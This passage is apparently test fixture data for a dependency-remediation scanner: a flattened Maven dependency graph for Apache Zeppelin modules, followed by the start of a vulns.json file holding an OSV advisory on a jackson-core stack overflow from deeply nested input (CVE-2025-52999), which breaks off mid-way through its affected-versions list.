ch.qos.reload4j:reload4j@1.2.25 org.slf4j:jcl-over-slf4j@1.7.35 org.apache.maven:maven-plugin-api@3.6.3 MavenExclusions org.codehaus.plexus:plexus-classworlds,org.codehaus.plexus:plexus-utils|org.eclipse.sisu:org.eclipse.sisu.plexus@0.3.4 org.apache.maven:maven-resolver-provider@3.6.3 org.apache.maven.resolver:maven-resolver-connector-basic@1.4.1 org.apache.maven.resolver:maven-resolver-transport-file@1.4.1 org.apache.maven.resolver:maven-resolver-transport-http@1.4.1 jline:jline@2.14.3 Scope provided MavenExclusions log4j:log4j,org.slf4j:slf4j-log4j12|org.apache.hadoop:hadoop-common@2.7.7 Scope provided 
MavenExclusions log4j:log4j|org.apache.hadoop:hadoop-yarn-client@2.7.7 0.12.0 org.apache.zeppelin:zeppelin-common@0.12.0 org.apache.commons:commons-lang3@3.14.0 MavenExclusions commons-logging:commons-logging|org.apache.thrift:libthrift@0.13.0 com.google.code.gson:gson@2.8.9 com.google.code.findbugs:jsr305@3.0.2 MavenExclusions commons-logging:commons-logging|org.apache.commons:commons-configuration2@2.10.1 MavenExclusions commons-logging:commons-logging|commons-beanutils:commons-beanutils@1.9.4 org.apache.commons:commons-exec@1.3 org.apache.commons:commons-pool2@2.3 commons-io:commons-io@2.15.1 MavenExclusions ch.qos.reload4j:reload4j|org.slf4j:slf4j-reload4j@1.7.35 ch.qos.reload4j:reload4j@1.2.25 org.slf4j:jcl-over-slf4j@1.7.35 org.apache.maven:maven-plugin-api@3.6.3 MavenExclusions org.codehaus.plexus:plexus-classworlds,org.codehaus.plexus:plexus-utils|org.eclipse.sisu:org.eclipse.sisu.plexus@0.3.4 org.apache.maven:maven-resolver-provider@3.6.3 org.apache.maven.resolver:maven-resolver-connector-basic@1.4.1 org.apache.maven.resolver:maven-resolver-transport-file@1.4.1 org.apache.maven.resolver:maven-resolver-transport-http@1.4.1 jline:jline@2.14.3 Scope provided MavenExclusions commons-logging:commons-logging|org.apache.hadoop:hadoop-client-runtime@3.3.6 org.apache.zeppelin:zeppelin-jupyter 0.11.1 com.google.code.gson:gson@2.8.9 org.danilopianini:gson-extras@0.2.2 commons-cli:commons-cli@1.4 MavenExclusions commons-logging:commons-logging|com.vladsch.flexmark:flexmark-all@0.62.2 org.apache.commons:commons-lang3@3.12.0 org.apache.zeppelin:zeppelin-zengine 0.11.1 org.apache.zeppelin:zeppelin-common@0.11.1 org.apache.zeppelin:zeppelin-interpreter@0.11.1 MavenExclusions org.ow2.asm:asm,org.jsoup:jsoup|org.apache.zeppelin:zeppelin-jupyter@0.11.1 org.slf4j:slf4j-api@1.7.35 commons-io:commons-io@2.7 commons-cli:commons-cli@1.4 org.bouncycastle:bcpkix-jdk15on@1.70 MavenExclusions commons-httpclient:commons-httpclient|org.apache.commons:commons-vfs2-jackrabbit1@2.6.0 
MavenExclusions commons-logging:commons-logging|org.apache.httpcomponents:httpclient@4.5.13 MavenExclusions commons-logging:commons-logging|org.apache.httpcomponents:httpasyncclient@4.0.2 org.eclipse.jetty:jetty-client@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-client@9.4.52.v20230823 org.quartz-scheduler:quartz@2.3.2 io.micrometer:micrometer-core@1.6.0 io.dropwizard.metrics:metrics-healthchecks@4.1.14 com.google.code.gson:gson@2.8.9 org.apache.lucene:lucene-core@8.7.0 org.apache.lucene:lucene-analyzers-common@8.7.0 org.apache.lucene:lucene-queryparser@8.7.0 org.apache.lucene:lucene-highlighter@8.7.0 MavenExclusions org.codehaus.plexus:plexus-utils,org.apache.commons:commons-compress,com.fasterxml.jackson.core:jackson-databind|com.github.eirslett:frontend-plugin-core@1.6 MavenExclusions org.codehaus.plexus:plexus-utils,org.apache.hadoop:hadoop-hdfs-client|org.apache.commons:commons-vfs2@2.6.0 org.eclipse.jgit:org.eclipse.jgit@4.5.4.201711221230-r org.codehaus.jettison:jettison@1.5.4 org.apache.commons:commons-lang3@3.12.0 org.apache.commons:commons-compress@1.21 Scope provided MavenExclusions log4j:log4j|org.apache.hadoop:hadoop-common@2.7.7 Scope provided MavenExclusions javax.servlet:servlet-api,org.apache.avro:avro,org.apache.jackrabbit:jackrabbit-webdav,io.netty:netty,commons-httpclient:commons-httpclient,org.eclipse.jgit:org.eclipse.jgit,com.jcraft:jsch,org.apache.commons:commons-compress,xml-apis:xml-apis,xerces:xercesImpl,org.codehaus.jackson:jackson-mapper-asl,org.codehaus.jackson:jackson-core-asl,com.google.guava:guava,com.google.code.findbugs:jsr305,org.apache.commons:commons-math3,commons-logging:commons-logging,log4j:log4j|org.apache.hadoop:hadoop-yarn-client@2.7.7 org.apache.zookeeper:zookeeper 3.4.6 org.slf4j:slf4j-api@1.6.1 org.slf4j:slf4j-log4j12@1.6.1 Opt|org.apache.maven.wagon:wagon-http@2.4 Opt|org.apache.maven:maven-ant-tasks@2.1.3 log4j:log4j@1.2.16 jline:jline@0.9.94 io.netty:netty@3.7.0.Final Opt|org.vafer:jdeb@0.8 
Opt|jdiff:jdiff@1.0.9 Opt|xerces:xerces@1.4.4 Opt|org.apache.rat:apache-rat-tasks@0.6 Opt|commons-lang:commons-lang@2.4 Opt|commons-collections:commons-collections@3.1 org.apache:apache 4 6 7 9 10 11 12 13 14 15 16 17 18 19 21 23 24 27 28 29 30 31 33 34 35 org.apiguardian:apiguardian-api 1.1.0 org.assertj:assertj-core 1.7.0 Scope provided|junit:junit@4.10 Opt|cglib:cglib-nodep@2.2.2 org.awaitility:awaitility 4.2.0 org.hamcrest:hamcrest@2.1 org.bitbucket.cowwoc:diff-match-patch 1.1 org.bouncycastle:bcpkix-jdk15on 1.70 org.bouncycastle:bcprov-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on 1.70 org.bouncycastle:bcutil-jdk15on 1.70 org.bouncycastle:bcprov-jdk15on@1.70 org.brotli:dec 0.1.2 org.brotli:parent 0.1.2 org.checkerframework:checker-compat-qual 2.0.0 org.checkerframework:checker-qual 3.33.0 org.codehaus.jackson:jackson-core-asl 1.9.13 org.codehaus.jackson:jackson-jaxrs 1.8.3 org.codehaus.jackson:jackson-core-asl@1.8.3 org.codehaus.jackson:jackson-mapper-asl@1.8.3 org.codehaus.jackson:jackson-mapper-asl 1.9.13 org.codehaus.jackson:jackson-core-asl@1.9.13 org.codehaus.jackson:jackson-xc 1.8.3 org.codehaus.jackson:jackson-core-asl@1.8.3 org.codehaus.jackson:jackson-mapper-asl@1.8.3 org.codehaus.jettison:jettison 1.5.4 org.codehaus.mojo:animal-sniffer-annotations 1.14 org.codehaus.mojo:animal-sniffer-parent 1.14 org.codehaus.mojo:mojo-parent 34 org.codehaus.plexus:plexus 2.0.7 5.1 org.codehaus.plexus:plexus-classworlds 2.6.0 org.codehaus.plexus:plexus-component-annotations 1.5.5 org.codehaus.plexus:plexus-containers 1.5.5 org.codehaus.plexus:plexus-interpolation 1.25 org.codehaus.plexus:plexus-utils 3.2.1 org.codehaus:codehaus-parent 1 4 org.danilopianini:gson-extras 0.2.2 com.google.code.gson:gson@2.8.6 Scope runtime|javax.annotation:jsr250-api@1.0 org.eclipse.ee4j:project 1.0.2 1.0.5 1.0.6 org.eclipse.jetty.websocket:javax-websocket-client-impl 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-client@9.4.52.v20230823 
javax.websocket:javax.websocket-client-api@1.0 org.eclipse.jetty.websocket:javax-websocket-server-impl 9.4.52.v20230823 org.eclipse.jetty:jetty-annotations@9.4.52.v20230823 org.eclipse.jetty.websocket:javax-websocket-client-impl@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-server@9.4.52.v20230823 javax.websocket:javax.websocket-api@1.0 org.eclipse.jetty.websocket:websocket-api 9.2.12.v20150709 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-client 9.2.12.v20150709 org.eclipse.jetty:jetty-util@9.2.12.v20150709 org.eclipse.jetty:jetty-io@9.2.12.v20150709 org.eclipse.jetty.websocket:websocket-common@9.2.12.v20150709 9.4.52.v20230823 org.eclipse.jetty:jetty-client@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-xml@9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 org.eclipse.jetty:jetty-io@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-common@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-common 9.2.12.v20150709 org.eclipse.jetty.websocket:websocket-api@9.2.12.v20150709 org.eclipse.jetty:jetty-util@9.2.12.v20150709 org.eclipse.jetty:jetty-io@9.2.12.v20150709 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-api@9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 org.eclipse.jetty:jetty-io@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-parent 9.2.12.v20150709 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-server 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-common@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-client@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-servlet@9.4.52.v20230823 org.eclipse.jetty:jetty-servlet@9.4.52.v20230823 Scope provided|javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-http@9.4.52.v20230823 Scope provided|org.eclipse.jetty:jetty-server@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-servlet 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-api@9.4.52.v20230823 javax.servlet:javax.servlet-api@3.1.0 
org.eclipse.jetty:jetty-annotations 9.4.52.v20230823 org.eclipse.jetty:jetty-plus@9.4.52.v20230823 org.eclipse.jetty:jetty-webapp@9.4.52.v20230823 javax.annotation:javax.annotation-api@1.3.2 org.ow2.asm:asm@9.5 org.ow2.asm:asm-commons@9.5 org.eclipse.jetty:jetty-client 9.4.52.v20230823 org.eclipse.jetty:jetty-http@9.4.52.v20230823 org.eclipse.jetty:jetty-io@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-jmx@9.4.52.v20230823 org.eclipse.jetty:jetty-core 12.0.12 org.eclipse.jetty:jetty-http 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 org.eclipse.jetty:jetty-io@9.4.52.v20230823 Scope provided|javax.servlet:javax.servlet-api@3.1.0 12.0.12 org.eclipse.jetty:jetty-io@12.0.12 org.eclipse.jetty:jetty-util@12.0.12 org.slf4j:slf4j-api@2.0.13 org.eclipse.jetty:jetty-io 9.2.12.v20150709 org.eclipse.jetty:jetty-util@9.2.12.v20150709 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-jmx@9.4.52.v20230823 org.eclipse.jetty:jetty-jmx 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 org.eclipse.jetty:jetty-jndi 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 Scope provided|org.eclipse.jetty:jetty-webapp@9.4.52.v20230823 Scope provided MavenExclusions org.eclipse.jetty.orbit:javax.activation|org.eclipse.jetty.orbit:javax.mail.glassfish@1.4.1.v201005082020 org.eclipse.jetty:jetty-parent 14 23 org.eclipse.jetty:jetty-plus 9.4.52.v20230823 Scope provided|javax.transaction:javax.transaction-api@1.3 org.eclipse.jetty:jetty-webapp@9.4.52.v20230823 org.eclipse.jetty:jetty-jndi@9.4.52.v20230823 org.eclipse.jetty:jetty-project 9.2.12.v20150709 9.4.52.v20230823 9.4.56.v20240826 9.4.57.v20241219 12.0.12 org.eclipse.jetty:jetty-security 9.4.52.v20230823 org.eclipse.jetty:jetty-server@9.4.52.v20230823 org.eclipse.jetty:jetty-server 9.4.52.v20230823 javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-http@9.4.52.v20230823 org.eclipse.jetty:jetty-io@9.4.52.v20230823 
Opt|org.eclipse.jetty:jetty-jmx@9.4.52.v20230823 9.4.56.v20240826 javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-http@9.4.56.v20240826 org.eclipse.jetty:jetty-io@9.4.56.v20240826 Opt|org.eclipse.jetty:jetty-jmx@9.4.56.v20240826 9.4.57.v20241219 javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-http@9.4.57.v20241219 org.eclipse.jetty:jetty-io@9.4.57.v20241219 Opt|org.eclipse.jetty:jetty-jmx@9.4.57.v20241219 org.eclipse.jetty:jetty-servlet 9.4.52.v20230823 org.eclipse.jetty:jetty-security@9.4.52.v20230823 org.eclipse.jetty:jetty-util-ajax@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-jmx@9.4.52.v20230823 org.eclipse.jetty:jetty-util 9.2.12.v20150709 Scope provided|javax.servlet:javax.servlet-api@3.1.0 Opt Scope provided|org.slf4j:slf4j-api@1.6.6 9.4.52.v20230823 org.eclipse.jetty:jetty-util-ajax 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 Scope provided|javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-webapp 9.4.52.v20230823 org.eclipse.jetty:jetty-xml@9.4.52.v20230823 org.eclipse.jetty:jetty-servlet@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-jmx@9.4.52.v20230823 org.eclipse.jetty:jetty-xml 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 org.eclipse.jgit:org.eclipse.jgit 4.5.4.201711221230-r com.jcraft:jsch@0.1.53 com.googlecode.javaewah:JavaEWAH@0.7.9 org.apache.httpcomponents:httpclient@4.3.6 org.slf4j:slf4j-api@1.7.2 Scope provided|javax.servlet:javax.servlet-api@3.1.0 5.13.3.202401111512-r com.googlecode.javaewah:JavaEWAH@1.1.13 org.slf4j:slf4j-api@1.7.30 6.10.1.202505221210-r com.googlecode.javaewah:JavaEWAH@1.2.3 org.slf4j:slf4j-api@1.7.36 commons-codec:commons-codec@1.17.0 org.eclipse.jgit:org.eclipse.jgit-parent 4.5.4.201711221230-r 5.13.3.202401111512-r 6.10.1.202505221210-r org.eclipse.sisu:org.eclipse.sisu.inject 0.3.4 Scope provided|com.google.inject:guice@3.0 org.eclipse.sisu:org.eclipse.sisu.plexus 0.3.4 Scope provided|com.google.inject:guice@3.0 MavenExclusions 
javax.el:el-api,org.jboss.ejb3:jboss-ejb3-api,org.jboss.interceptor:jboss-interceptor-api|javax.enterprise:cdi-api@1.0 org.eclipse.sisu:org.eclipse.sisu.inject@0.3.4 org.codehaus.plexus:plexus-component-annotations@1.5.5 org.codehaus.plexus:plexus-classworlds@2.5.2 org.codehaus.plexus:plexus-utils@3.0.17 Opt|junit:junit@4.11 org.eclipse.sisu:sisu-inject 0.3.4 org.eclipse.sisu:sisu-plexus 0.3.4 org.glassfish.hk2.external:aopalliance-repackaged 2.6.1 Opt|aopalliance:aopalliance@1.0 org.glassfish.hk2.external:jakarta.inject 2.6.1 Opt|javax.inject:javax.inject@1 org.glassfish.hk2:external 2.6.1 org.glassfish.hk2:hk2-api 2.6.1 Opt|org.glassfish.hk2:osgi-resource-locator@1.0.3 org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.hk2:hk2-utils@2.6.1 org.glassfish.hk2.external:aopalliance-repackaged@2.6.1 org.glassfish.hk2:hk2-locator 2.6.1 org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.hk2.external:aopalliance-repackaged@2.6.1 org.glassfish.hk2:hk2-api@2.6.1 org.glassfish.hk2:hk2-utils@2.6.1 jakarta.annotation:jakarta.annotation-api@1.3.4 org.javassist:javassist@3.22.0-CR2 org.glassfish.hk2:hk2-parent 2.6.1 org.glassfish.hk2:hk2-utils 2.6.1 jakarta.annotation:jakarta.annotation-api@1.3.4 org.glassfish.hk2.external:jakarta.inject@2.6.1 Opt|javax.validation:validation-api@2.0.1.Final Opt|org.hibernate.validator:hibernate-validator@6.0.10.Final Opt|org.jboss.logging:jboss-logging@3.3.1.Final Opt|com.fasterxml:classmate@1.3.3 org.glassfish.hk2:osgi-resource-locator 1.0.3 Scope provided|org.osgi:osgi.core@6.0.0 Scope provided|org.osgi:osgi.cmpn@6.0.0 org.glassfish.jersey.containers:jersey-container-servlet-core 2.30 Scope provided|jakarta.servlet:jakarta.servlet-api@4.0.3 Scope provided|jakarta.persistence:jakarta.persistence-api@2.2.3 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.jersey.core:jersey-common@2.30 org.glassfish.jersey.core:jersey-server@2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 
org.glassfish.jersey.containers:project 2.30 org.glassfish.jersey.core:jersey-common@2.30 org.glassfish.jersey.core:jersey-server@2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.core:jersey-client 2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.core:jersey-common@2.30 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.jersey.core:jersey-common 2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 jakarta.annotation:jakarta.annotation-api@1.3.5 Scope provided|org.osgi:org.osgi.core@6.0.0 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.hk2:osgi-resource-locator@1.0.3 2.34 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 jakarta.annotation:jakarta.annotation-api@1.3.5 Scope provided|org.osgi:org.osgi.core@6.0.0 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.hk2:osgi-resource-locator@1.0.3 org.glassfish.jersey.core:jersey-server 2.30 org.glassfish.jersey.core:jersey-common@2.30 org.glassfish.jersey.core:jersey-client@2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.media:jersey-media-jaxb@2.30 jakarta.annotation:jakarta.annotation-api@1.3.5 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 jakarta.validation:jakarta.validation-api@2.0.2 Scope provided|org.osgi:org.osgi.core@6.0.0 org.glassfish.jersey.ext:jersey-entity-filtering 2.30 Scope provided|org.glassfish.jersey.core:jersey-client@2.30 Scope provided|org.glassfish.jersey.core:jersey-server@2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.ext:project 2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.inject:jersey-hk2 2.30 org.glassfish.jersey.core:jersey-common@2.30 MavenExclusions jakarta.annotation:jakarta.annotation-api,org.javassist:javassist|org.glassfish.hk2:hk2-locator@2.6.1 org.javassist:javassist@3.25.0-GA org.glassfish.jersey.inject:project 2.30 
org.glassfish.jersey.media:jersey-media-jaxb 2.30 org.glassfish.jersey.core:jersey-common@2.30 Scope provided|jakarta.xml.bind:jakarta.xml.bind-api@2.3.2 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.hk2:osgi-resource-locator@1.0.3 org.glassfish.jersey.media:jersey-media-json-jackson 2.30 org.glassfish.jersey.core:jersey-common@2.30 org.glassfish.jersey.ext:jersey-entity-filtering@2.30 com.fasterxml.jackson.core:jackson-annotations@2.9.9 com.fasterxml.jackson.core:jackson-databind@2.9.9 com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.9.9 org.glassfish.jersey.media:project 2.30 org.glassfish.jersey:project 2.30 2.34 org.glassfish.web:jsp 2.2 org.hamcrest:hamcrest 2.2 org.hdrhistogram:HdrHistogram 2.1.12 org.hibernate.search:hibernate-search-bom 7.1.1.Final org.infinispan:infinispan-bom 11.0.17.Final 11.0.19.Final 15.0.5.Final org.infinispan:infinispan-build-configuration-parent 11.0.17.Final 11.0.19.Final 15.0.5.Final org.javassist:javassist 3.25.0-GA org.jboss.weld:weld-api-bom 1.0 org.jboss.weld:weld-api-parent 1.0 org.jboss.weld:weld-parent 6 org.jboss:jboss-parent 36 43 org.jetbrains:annotations 15.0 org.json:json 20240205 org.junit.jupiter:junit-jupiter-api 5.7.1 org.apiguardian:apiguardian-api@1.1.0 org.opentest4j:opentest4j@1.2.0 org.junit.platform:junit-platform-commons@1.7.1 org.junit.jupiter:junit-jupiter-engine 5.7.1 org.apiguardian:apiguardian-api@1.1.0 org.junit.platform:junit-platform-engine@1.7.1 org.junit.jupiter:junit-jupiter-api@5.7.1 org.junit.jupiter:junit-jupiter-params 5.7.1 org.apiguardian:apiguardian-api@1.1.0 org.junit.jupiter:junit-jupiter-api@5.7.1 org.junit.platform:junit-platform-commons 1.7.1 org.apiguardian:apiguardian-api@1.1.0 org.junit.platform:junit-platform-engine 1.7.1 org.apiguardian:apiguardian-api@1.1.0 org.opentest4j:opentest4j@1.2.0 org.junit.platform:junit-platform-commons@1.7.1 org.junit:junit-bom 5.7.1 5.9.1 5.9.2 5.10.0 5.10.1 5.10.2 5.10.3 5.10.5 
5.11.4 5.12.2 5.13.1 org.kohsuke:libpam4j 1.11 net.java.dev.jna:jna@4.5.2 org.kohsuke:pom 17 org.latencyutils:LatencyUtils 2.0.3 org.hdrhistogram:HdrHistogram@2.1.8 org.mockito:mockito-core 3.12.4 net.bytebuddy:byte-buddy@1.11.13 net.bytebuddy:byte-buddy-agent@1.11.13 org.objenesis:objenesis@3.2 org.mortbay.jetty:jetty 6.1.26 org.mortbay.jetty:jetty-util@6.1.26 org.mortbay.jetty:servlet-api@2.5-20081211 org.mortbay.jetty:jetty-parent 10 org.mortbay.jetty:jetty-sslengine 6.1.26 org.mortbay.jetty:jetty@6.1.26 org.mortbay.jetty:jetty-util 6.1.26 Scope provided|org.mortbay.jetty:servlet-api@2.5-20081211 Opt|org.slf4j:slf4j-api@1.3.1 org.mortbay.jetty:project 6.1.26 org.nibor.autolink:autolink 0.6.0 org.objenesis:objenesis 2.5.1 3.2 org.objenesis:objenesis-parent 2.5.1 3.2 org.opentest4j:opentest4j 1.2.0 org.osgi:org.osgi.core 6.0.0 org.ow2.asm:asm 5.0.4 9.5 org.ow2.asm:asm-bom 9.7 org.ow2.asm:asm-commons 9.5 org.ow2.asm:asm@9.5 org.ow2.asm:asm-tree@9.5 org.ow2.asm:asm-parent 5.0.4 org.ow2.asm:asm-tree 9.5 org.ow2.asm:asm@9.5 org.ow2:ow2 1.3 1.5.1 org.owasp.encoder:encoder 1.2.3 org.owasp.encoder:encoder-parent 1.2.3 org.quartz-scheduler:quartz 2.3.2 com.mchange:c3p0@0.9.5.4 com.mchange:mchange-commons-java@0.2.15 com.zaxxer:HikariCP-java7@2.4.13 org.slf4j:slf4j-api@1.7.7 org.quartz-scheduler:quartz-parent 2.3.2 org.seleniumhq.selenium:selenium-api 2.48.2 com.google.guava:guava@18.0 com.google.code.gson:gson@2.3.1 org.apache.httpcomponents:httpclient@4.5.1 org.seleniumhq.selenium:selenium-chrome-driver 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 org.seleniumhq.selenium:selenium-edge-driver 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 commons-io:commons-io@2.4 org.apache.commons:commons-exec@1.3 org.seleniumhq.selenium:selenium-firefox-driver 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 commons-io:commons-io@2.4 org.apache.commons:commons-exec@1.3 org.seleniumhq.selenium:selenium-htmlunit-driver 2.48.2 
org.seleniumhq.selenium:selenium-support@2.48.2 net.sourceforge.htmlunit:htmlunit@2.18 org.apache.httpcomponents:httpclient@4.5.1 org.seleniumhq.selenium:selenium-ie-driver 2.48.2 net.java.dev.jna:jna@4.1.0 net.java.dev.jna:jna-platform@4.1.0 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 org.seleniumhq.selenium:selenium-java 2.48.2 org.seleniumhq.selenium:selenium-chrome-driver@2.48.2 org.seleniumhq.selenium:selenium-edge-driver@2.48.2 org.seleniumhq.selenium:selenium-htmlunit-driver@2.48.2 org.seleniumhq.selenium:selenium-firefox-driver@2.48.2 org.seleniumhq.selenium:selenium-ie-driver@2.48.2 org.seleniumhq.selenium:selenium-safari-driver@2.48.2 org.seleniumhq.selenium:selenium-support@2.48.2 org.webbitserver:webbit@0.4.14 org.seleniumhq.selenium:selenium-leg-rc@2.48.2 org.seleniumhq.selenium:selenium-leg-rc 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 Opt|junit:junit@4.12 Opt|org.testng:testng@6.8 org.seleniumhq.selenium:selenium-parent 2.48.2 org.seleniumhq.selenium:selenium-remote-driver 2.48.2 cglib:cglib-nodep@2.1_3 com.google.code.gson:gson@2.3.1 org.seleniumhq.selenium:selenium-api@2.48.2 org.apache.httpcomponents:httpclient@4.5.1 com.google.guava:guava@18.0 org.apache.commons:commons-exec@1.3 net.java.dev.jna:jna@4.1.0 net.java.dev.jna:jna-platform@4.1.0 org.seleniumhq.selenium:selenium-safari-driver 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 org.webbitserver:webbit@0.4.14 org.seleniumhq.selenium:selenium-support 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 Opt|org.hamcrest:hamcrest-all@1.3 Opt|junit:junit@4.12 org.slf4j:jcl-over-slf4j 1.7.35 org.slf4j:slf4j-api@1.7.35 org.slf4j:slf4j-api 1.7.5 1.7.7 1.7.26 1.7.30 1.7.35 1.7.36 org.slf4j:slf4j-log4j12 1.7.10 org.slf4j:slf4j-api@1.7.10 log4j:log4j@1.2.17 org.slf4j:slf4j-parent 1.7.5 1.7.7 1.7.10 1.7.26 1.7.30 1.7.35 1.7.36 org.slf4j:slf4j-reload4j 1.7.35 org.slf4j:slf4j-api@1.7.35 ch.qos.reload4j:reload4j@1.2.18.3 org.sonatype.forge:forge-parent 6 
org.sonatype.oss:oss-parent 3 5 6 7 9 org.sonatype.sisu.inject:cglib 2.2.1-v20090111 asm:asm@3.1 Opt|asm:asm-util@3.1 Opt|org.apache.ant:ant@1.8.1 org.testcontainers:junit-jupiter 1.19.0 org.testcontainers:testcontainers@1.19.0 org.testcontainers:neo4j 1.19.0 org.testcontainers:testcontainers@1.19.0 org.testcontainers:testcontainers 1.19.0 junit:junit@4.13.2 org.slf4j:slf4j-api@1.7.36 org.apache.commons:commons-compress@1.23.0 org.rnorth.duct-tape:duct-tape@1.0.8 com.github.docker-java:docker-java-api@3.3.3 com.github.docker-java:docker-java-transport-zerodep@3.3.3 Scope provided|com.google.cloud.tools:jib-core@0.23.0 org.testcontainers:testcontainers-bom 1.16.1 1.19.8 1.20.1 1.20.4 org.w3c.css:sac 1.3 org.webbitserver:webbit 0.4.14 io.netty:netty@3.5.2.Final org.xerial.snappy:snappy-java 1.0.4.1 Scope provided|org.osgi:core@4.3.0 xalan:serializer 2.7.2 xml-apis:xml-apis@1.3.04 Opt|xerces:xercesImpl@2.9.1 xalan:xalan 2.7.2 xalan:serializer@2.7.2 Opt|xerces:xercesImpl@2.9.1 2.7.3 xerces:xercesImpl 2.11.0 xml-apis:xml-apis@1.4.01 Opt|xml-resolver:xml-resolver@1.2 2.12.0 xml-apis:xml-apis@1.4.01 Opt|xml-resolver:xml-resolver@1.2 2.12.1 xml-apis:xml-apis@1.4.01 Opt|xml-resolver:xml-resolver@1.2 2.12.2 xml-apis:xml-apis@1.4.01 Opt|xml-resolver:xml-resolver@1.2 xml-apis:xml-apis 1.4.01 xmlenc:xmlenc 0.52 ================================================ FILE: internal/remediation/testdata/zeppelin-server/vulns.json ================================================ { "vulns": [ { "schema_version": "1.7.3", "id": "GHSA-h46c-h94j-95f3", "published": "2025-06-27T15:22:22Z", "modified": "2025-06-27T16:03:13.670847Z", "aliases": [ "CVE-2025-52999" ], "related": [ "CGA-88hr-3c27-vpx8", "CGA-m7mg-3mjw-9pmv" ], "summary": "jackson-core can throw a StackoverflowError when processing deeply nested data", "details": "### Impact\nWith older versions of jackson-core, if you parse an input file and it has deeply nested data, Jackson could end up throwing a StackoverflowError if the depth 
is particularly large.\n\n### Patches\njackson-core 2.15.0 contains a configurable limit for how deep Jackson will traverse in an input document, defaulting to an allowable depth of 1000. Change is in https://github.com/FasterXML/jackson-core/pull/943. jackson-core will throw a StreamConstraintsException if the limit is reached.\njackson-databind also benefits from this change because it uses jackson-core to parse JSON inputs.\n\n### Workarounds\nUsers should avoid parsing input files from untrusted sources.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-core", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.15.0" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.7", "2.13.0", "2.13.0-rc1", "2.13.0-rc2", "2.13.1", "2.13.2", "2.13.3", "2.13.4", "2.13.5", "2.14.0", "2.14.0-rc1", "2.14.0-rc2", "2.14.0-rc3", "2.14.1", "2.14.2", "2.14.3", "2.15.0-rc1", "2.15.0-rc2", "2.15.0-rc3", "2.2.0", 